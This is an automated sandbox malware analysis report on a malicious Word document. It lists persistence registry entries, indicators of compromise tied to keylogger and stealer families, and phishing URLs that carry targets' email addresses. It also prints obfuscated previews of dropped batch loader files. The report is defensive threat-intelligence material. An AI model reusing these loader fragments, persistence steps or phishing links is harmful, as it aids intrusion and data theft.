                                                                                                                                Analysis ID:1584674
                                                                                                                                Start date and time:2025-01-06 07:52:10 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 10m 45s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:20
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • GSI enabled (VBA)
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:PI ITS15235.doc
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.expl.evad.winDOC@24/10@6/7
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 100%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 99%
                                                                                                                                • Number of executed functions: 187
                                                                                                                                • Number of non-executed functions: 81
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .doc
                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                • Attach to Office via COM
                                                                                                                                • Scroll down
                                                                                                                                • Close Viewer

                                                                                                                                Warnings

                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 184.28.90.27, 51.132.193.104, 52.111.243.43, 52.111.243.42, 52.111.243.41, 52.111.243.40, 95.100.110.68, 95.100.110.78, 52.109.28.47, 20.190.159.68, 20.12.23.50, 13.107.246.45
                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprduks02.uksouth.cloudapp.azure.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, neu-azsc-config.officeapps.live.com, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, uks-azsc-000.roamin
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                01:53:16API Interceptor2x Sleep call for process: brightness.exe modified
                                                                                                                                01:53:26API Interceptor1784500x Sleep call for process: npratlsN.pif modified
                                                                                                                                01:53:31API Interceptor4x Sleep call for process: Nsltarpn.PIF modified
                                                                                                                                06:53:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url
                                                                                                                                06:53:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nsltarpn C:\Users\Public\Nsltarpn.url

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                149.154.167.220kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                        https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                          W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    158.101.44.242PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    ZOYGRL1ePa.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Requested Documentation.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • checkip.dyndns.org/

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    mail.irco.com.saSP0npSA64a.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 46.151.208.21
                                                                                                                                                    7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 46.151.208.21
                                                                                                                                                    reallyfreegeoip.orgkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 104.21.67.152
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    checkip.dyndns.comkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.8.169
                                                                                                                                                    PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 132.226.8.169
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 132.226.247.73
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    api.telegram.orgkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    mcgen.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 149.154.167.220

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    TELEGRAMRUkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rmgfuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=olgelfuabFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    ZT0KQ1PC.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.99
                                                                                                                                                    ORACLE-BMC-31898USFantazy.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 193.123.7.176
                                                                                                                                                    fuckunix.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 144.25.181.0
                                                                                                                                                    PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    test.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 130.61.86.87
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 158.101.44.242
                                                                                                                                                    image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 193.122.130.0
                                                                                                                                                    Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 140.238.15.187
                                                                                                                                                    AS-26496-GO-DADDY-COM-LLCUSfuckunix.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 50.62.7.191
                                                                                                                                                    Josho.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 72.167.237.175
                                                                                                                                                    DRlFlg7OV8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 166.62.28.147
                                                                                                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                    • 192.169.229.195
                                                                                                                                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                    • 148.72.251.75
                                                                                                                                                    https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.ptGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 216.69.174.68
                                                                                                                                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 68.178.157.109
                                                                                                                                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                    • 192.186.210.173
                                                                                                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 68.178.185.215
                                                                                                                                                    nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 198.71.185.150

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adkP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    W2k2NLSvja.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    FACT0987789000900.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ekP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                    • 149.154.167.220
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Installer_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 166.62.27.188
                                                                                                                                                    Aura.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                    • 166.62.27.188

                                                                                                                                                    Dropped Files

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\Public\Libraries\npratlsN.pifPO#5_Tower_049.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                      HSBC_PAY.SCR.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                        PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                              Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                  RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                    Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                      F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\Users\Public\Libraries\FX.cmd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8556
                                                                                                                                                                        Entropy (8bit):4.623706637784657
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                                                                                        MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                                                                                        SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                                                                                        SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                                                                                        SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                                                                                                                                                        C:\Users\Public\Libraries\NEO.cmd

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):46543
                                                                                                                                                                        Entropy (8bit):4.705001079878445
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                                                                                        MD5:637A66953F03B084808934ED7DF7192F
                                                                                                                                                                        SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                                                                                        SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                                                                                        SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                                                                                                                                                        C:\Users\Public\Libraries\Nsltarpn

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):587005
                                                                                                                                                                        Entropy (8bit):7.97982343807899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:7uJf6JY7FoblH0FkRaIHJ4tw0nCdxeJSRrUe9dZA:74f6q7Fw4Ga1twkqxegRoE0
